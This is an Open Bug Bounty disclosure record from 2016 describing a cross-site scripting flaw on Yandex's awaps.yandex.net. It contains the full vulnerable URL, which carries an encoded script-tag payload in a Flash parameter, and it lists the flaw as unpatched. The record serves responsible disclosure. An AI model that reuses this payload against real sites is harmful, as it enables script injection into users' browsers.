awaps.yandex.net XSS vulnerability

2016-09-01T13:09:00
ID OBB:179243
Type openbugbounty
Reporter amlnspqr
Modified 2016-09-20T05:12:00

Description

Vulnerable URL:
https://awaps.yandex.net/0/c1/tVK-Oiz0m0j3O9jfnHqg-oWAMFHblrR+niH5yt1oiVbK9eDrd2yu8H2HN46xn_t05DGsPpasEd3fH6AnnwGHFuUv-DjSW+FQNzvDlD7qHKOIWrR5UXZIWnmoX1-_t-F-p-FqUnM+2wpuNyPMIMGStAaWzMtJQLetFVAHvYynlL3N73YFaIiHlD0zX_tzEhjvNKQQ6O+W+6tA7t26TWgmKRlndEa+rb0CWXIdVy9lBUmDyPZkKLHRSJT_thdUeDPtoj6hDRw7pvMcRGpydTnA8CGAWLuRPfGZQ9Ycrhj-MCVV0OoTDinBz_fsVh3DLWMOg0rxgNFiRYTYL00aTYuADgNXz+bpmVgOwAA_A_.swf?link1=data:html,%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C/script%3E&backgroundimage;=https://avatars.yandex.net/get-bunker/e6194665f1f86fac30b0a61a4e656e0b885844cd/normal/e61946.png
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 1 September, 2016 13:09 GMT
Vulnerability existence verified and confirmed| 6 September, 2016 05:06 GMT
Generic security notifications sent to website owner| 6 September, 2016 05:06 GMT
Vulnerability details disclosed by researcher| 20 September, 2016 05:12 GMT